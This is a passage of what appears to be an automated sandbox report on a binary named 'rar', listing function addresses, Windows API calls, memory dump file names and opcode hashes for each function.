                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1239891234-0
                                                                                                                                                                      • Opcode ID: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
                                                                                                                                                                      • Instruction ID: 39adb5df7176186f126c91785b5ca27ebae6314de348b5b3117b82cc8e115fb8
                                                                                                                                                                      • Opcode Fuzzy Hash: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
                                                                                                                                                                      • Instruction Fuzzy Hash: D1316D37608B8186DB608F24E8403AA33A4FB98758F510136EA8D83B98EF79C165CB05
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE74EF50 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3398352648-0
                                                                                                                                                                      • Opcode ID: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
                                                                                                                                                                      • Instruction ID: 256fcdd5afeece214ee3469ebe50379652eac1afc1eeef3c93c1cf9c62afafdc
                                                                                                                                                                      • Opcode Fuzzy Hash: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
                                                                                                                                                                      • Instruction Fuzzy Hash: 5A117F33A18B4186EB508F61F44066BB3A5FB98B90F454436FA8E83A28DF7DE015CB44
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE753A70 Relevance: 6.1, APIs: 4, Instructions: 74fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileW.KERNEL32(?,?,?,00007FF6EE7511B0,?,?,?,00000000,?,?,00007FF6EE74F30F,00000000,00007FF6EE736380,?,00007FF6EE732EC8), ref: 00007FF6EE753AC4
                                                                                                                                                                      • CreateFileW.KERNEL32(?,?,?,00007FF6EE7511B0,?,?,?,00000000,?,?,00007FF6EE74F30F,00000000,00007FF6EE736380,?,00007FF6EE732EC8), ref: 00007FF6EE753B0A
                                                                                                                                                                      • DeviceIoControl.KERNEL32 ref: 00007FF6EE753B55
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,00007FF6EE7511B0,?,?,?,00000000,?,?,00007FF6EE74F30F,00000000,00007FF6EE736380,?,00007FF6EE732EC8), ref: 00007FF6EE753B60
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFile$CloseControlDeviceHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 998109204-0
                                                                                                                                                                      • Opcode ID: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
                                                                                                                                                                      • Instruction ID: 2df5fb08c05b9cb601935c04be98830e0bf8a6f041a1da3e78c2fb3caa20c537
                                                                                                                                                                      • Opcode Fuzzy Hash: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
                                                                                                                                                                      • Instruction Fuzzy Hash: 5331AF32618B8186EB608F11F44469AB7A5FB987E4F010235EEAD43BD8CF7DC465CB04
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE738884 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 324COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: CMT
                                                                                                                                                                      • API String ID: 0-2756464174
                                                                                                                                                                      • Opcode ID: 6111d3dafd19f65bc3558291276909d6d167d2f641e81f6c87bebc1b0329fce1
                                                                                                                                                                      • Instruction ID: 81404da86b389d8dac33628959cf7b03bd6a0b8c1d6a3bc9e4db80584cc8a303
                                                                                                                                                                      • Opcode Fuzzy Hash: 6111d3dafd19f65bc3558291276909d6d167d2f641e81f6c87bebc1b0329fce1
                                                                                                                                                                      • Instruction Fuzzy Hash: E5D10763A1868281EF60EB21D4482BD6391FFA5780F460531FA5E877D5DEBEE511C30A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE7986D4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6EE798704
                                                                                                                                                                        • Part of subcall function 00007FF6EE794E3C: GetCurrentProcess.KERNEL32(00007FF6EE799CC5), ref: 00007FF6EE794E69
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                                                                                                      • String ID: *?$.
                                                                                                                                                                      • API String ID: 2518042432-3972193922
                                                                                                                                                                      • Opcode ID: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
                                                                                                                                                                      • Instruction ID: de4b83c410992eb1de5f195630b0efb62791dcb2458571ece7d063ec8db988dc
                                                                                                                                                                      • Opcode Fuzzy Hash: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
                                                                                                                                                                      • Instruction Fuzzy Hash: F851F123B24A9585FF10CFA2D8016AC63A4FF64BD8B464531EE0D97B85EEBED061C305
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE77B340 Relevance: 4.5, APIs: 3, Instructions: 45memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3429775523-0
                                                                                                                                                                      • Opcode ID: db3c1d02e190598f29aa164aeddc5f855d0a4ca8ba77325bab1d25996cb1689a
                                                                                                                                                                      • Instruction ID: 57d54356ceef7a1070e652fcb9c474b5cac4e53601461aaf6c1ccbae0da0ed22
                                                                                                                                                                      • Opcode Fuzzy Hash: db3c1d02e190598f29aa164aeddc5f855d0a4ca8ba77325bab1d25996cb1689a
                                                                                                                                                                      • Instruction Fuzzy Hash: 7F113472B14A018AEB108FB5E4813AE7BB0FB48748F41153AEA8D93A58DF3CC154CB04
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE753144 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DiskFreeSpace
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1705453755-0
                                                                                                                                                                      • Opcode ID: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
                                                                                                                                                                      • Instruction ID: a116587916066a3e7d9e9f0ffc6dd25200f09d9da0bfbded397642d5a61c7dfb
                                                                                                                                                                      • Opcode Fuzzy Hash: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
                                                                                                                                                                      • Instruction Fuzzy Hash: 83016D23A2868186EF70DB25E4413AA73A0FB94748F810131F6CCC255CDEADD658CF05
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE796130 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                                                                                      • API String ID: 3215553584-2617248754
                                                                                                                                                                      • Opcode ID: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
                                                                                                                                                                      • Instruction ID: 511ca136a9618b9e854128389c17999a6bc2f9a9cc59a80a85e1c8dab72e024a
                                                                                                                                                                      • Opcode Fuzzy Hash: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
                                                                                                                                                                      • Instruction Fuzzy Hash: E141AD73A09B4589FB00CF64E8517A933A4EB28398F024236EE5C87B59DE7ED075C349
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE747988 Relevance: 13.6, APIs: 9, Instructions: 60COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Console$Mode$Handle$Readfflush
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1039280553-0
                                                                                                                                                                      • Opcode ID: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
                                                                                                                                                                      • Instruction ID: 1801f4029ef6b22c7a9ad4074285676b4bc6fc0775328434f1463caca69e5f58
                                                                                                                                                                      • Opcode Fuzzy Hash: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
                                                                                                                                                                      • Instruction Fuzzy Hash: 5821C227B1864283FF009F25E8002396361FBA9BA1F150135FE4E43768DEBEE456C705
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE780140 Relevance: 12.2, APIs: 8, Instructions: 205COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 932687459-0
                                                                                                                                                                      • Opcode ID: 17b6f32cd8d6fcc81585299b8a9163aaa78fd032cef7b8e26f7336cc4ddc1b9c
                                                                                                                                                                      • Instruction ID: 4c243f376adb5ec8ac2169f66ee66342b0f97774cd03187c1d834636128688ad
                                                                                                                                                                      • Opcode Fuzzy Hash: 17b6f32cd8d6fcc81585299b8a9163aaa78fd032cef7b8e26f7336cc4ddc1b9c
                                                                                                                                                                      • Instruction Fuzzy Hash: EA81F423E08A9285FF64DA11E4443BD6351EB74B94F164031FA4D87A99DFBEE462C30E
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE73C468 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 420COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: swprintf
                                                                                                                                                                      • String ID: ;%u$x%u$xc%u
                                                                                                                                                                      • API String ID: 233258989-2277559157
                                                                                                                                                                      • Opcode ID: 18e8202548affe00674286321b5f124759c48e138fb2ddf063aaae7488dbebd7
                                                                                                                                                                      • Instruction ID: 8b33b009302a6b88dcf278749a83187748b4dc6a3b7e3e4e372c0a3da6d537b2
                                                                                                                                                                      • Opcode Fuzzy Hash: 18e8202548affe00674286321b5f124759c48e138fb2ddf063aaae7488dbebd7
                                                                                                                                                                      • Instruction Fuzzy Hash: 7A02B123B1C68241FFA4DA21D1493FE2751AB61784F024031EA8EC7786DEBEE564C71B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE751634 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
